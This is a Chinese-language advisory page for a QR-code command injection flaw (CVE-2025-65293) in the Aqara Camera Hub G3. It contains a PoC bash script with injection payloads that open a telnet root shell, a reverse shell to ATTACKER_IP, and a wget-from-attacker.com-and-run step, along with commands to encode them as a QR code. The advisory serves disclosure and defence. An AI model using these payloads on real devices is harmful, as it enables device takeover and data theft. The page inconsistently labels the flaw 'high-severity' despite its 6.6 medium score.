CVE-2025-65293: Aqara Camera Hub G3 QR码命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-65293

漏洞类型

命令注入

CVSS评分

6.6 中危

攻击向量

物理 (AV:P)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Aqara Camera Hub G3

漏洞概述

CVE-2025-65293是影响Aqara Camera Hub G3设备的一个高危命令注入漏洞。该漏洞存在于固件版本4.1.9_0027中，允许攻击者通过精心构造的恶意QR码在设备设置和出厂重置过程中执行任意系统命令，最终获得root权限。由于该漏洞的CVSS评分为6.6，且攻击复杂度低（AC:L），对系统的机密性、完整性和可用性都造成了严重影响（均为高影响）。攻击者无需认证（PR:N）即可发起攻击，但需要物理接触设备（AV:P）并诱使目标用户扫描恶意QR码（UI:R）。由于Aqara Camera Hub G3是一款广泛使用的智能家居摄像头设备，该漏洞可能影响大量终端用户的安全。攻击成功后，攻击者可以完全控制设备，执行任意代码，窃取敏感数据，或将设备纳入僵尸网络进行进一步攻击。

技术细节

该命令注入漏洞的根本原因在于Aqara Camera Hub G3的QR码解析模块存在输入验证不足的问题。设备在处理QR码内容时，直接将QR码中的数据传递给系统命令执行函数，而未进行充分的过滤和转义处理。攻击者可以在QR码中嵌入恶意构造的命令序列，当设备扫描并解析该QR码时，这些命令将以root权限在设备上执行。具体来说，漏洞存在于设备设置向导和出厂重置功能的QR码扫描处理逻辑中。在设备初始化或重置过程中，系统会读取QR码内容并用于配置网络、设置凭证或其他参数。如果QR码中包含特殊构造的字符序列（如使用分号、管道符或反引号等shell元字符），这些字符会被shell解释器错误地解析为命令的一部分，从而导致命令注入。攻击者可以利用此漏洞执行任意系统命令，包括但不限于启动反向shell、下载和执行恶意软件、修改系统配置或提取敏感信息。由于设备以root权限运行，攻击者将获得对设备的完全控制权。

攻击链分析

STEP 1

步骤1

攻击者准备恶意QR码：构造包含命令注入payload的QR码内容，使用shell元字符（如分号、管道符、反引号）注入恶意命令

STEP 2

步骤2

物理接近目标设备：攻击者需要物理接触Aqara Camera Hub G3设备，在设备设置向导或出厂重置过程中诱使目标用户扫描恶意QR码

STEP 3

步骤3

设备解析QR码：目标用户在设备上扫描攻击者提供的恶意QR码，设备开始解析QR码内容

STEP 4

步骤4

命令注入触发：设备的QR码解析模块将QR码内容传递给系统命令执行函数，由于缺乏输入验证，恶意命令被成功注入

STEP 5

步骤5

命令执行：注入的恶意命令以root权限在设备上执行，攻击者获得完全控制权，可执行任意代码、窃取数据或建立持久化后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-65293 PoC - Malicious QR Code for Aqara Camera Hub G3
# This script generates a malicious QR code that exploits command injection
# Usage: Generate QR code and have target device scan it during setup/reset

# Method 1: Simple command injection via semicolon separator
MALICIOUS_PAYLOAD_1='wifi_ssid="test";telnetd -p 8888 -l /bin/sh'

# Method 2: Using backticks for command substitution
MALICIOUS_PAYLOAD_2='wifi_ssid="`telnetd -p 8888 -l /bin/sh`"'

# Method 3: Reverse shell payload
MALICIOUS_PAYLOAD_3='wifi_ssid="test";nc -e /bin/sh ATTACKER_IP 4444'

# Method 4: Download and execute malicious script
MALICIOUS_PAYLOAD_4='wifi_ssid="test";wget http://attacker.com/shell.sh|sh'

# Generate QR code using qrencode tool
# Install: apt-get install qrencode
qrencode -o malicious_qr.png "$MALICIOUS_PAYLOAD_3"

echo "Malicious QR code generated: malicious_qr.png"
echo "Have the target device scan this QR during setup or factory reset"

# Alternative: Use Python with qrcode library
# python3 -c "import qrcode; qrcode.make('$MALICIOUS_PAYLOAD_3').save('malicious_qr.png')"

影响范围

Aqara Camera Hub G3 固件版本 <= 4.1.9_0027

防御指南

临时缓解措施

由于该漏洞需要物理接触设备，用户应提高安全意识，避免扫描来源不明的QR码。同时，厂商应尽快发布安全更新修复该漏洞，用户在更新发布前应限制设备在受信任的环境中使用，并监控设备的异常行为。建议在网络层面实施隔离措施，限制受影响设备的网络访问权限，防止攻击成功后的横向移动和数据泄露。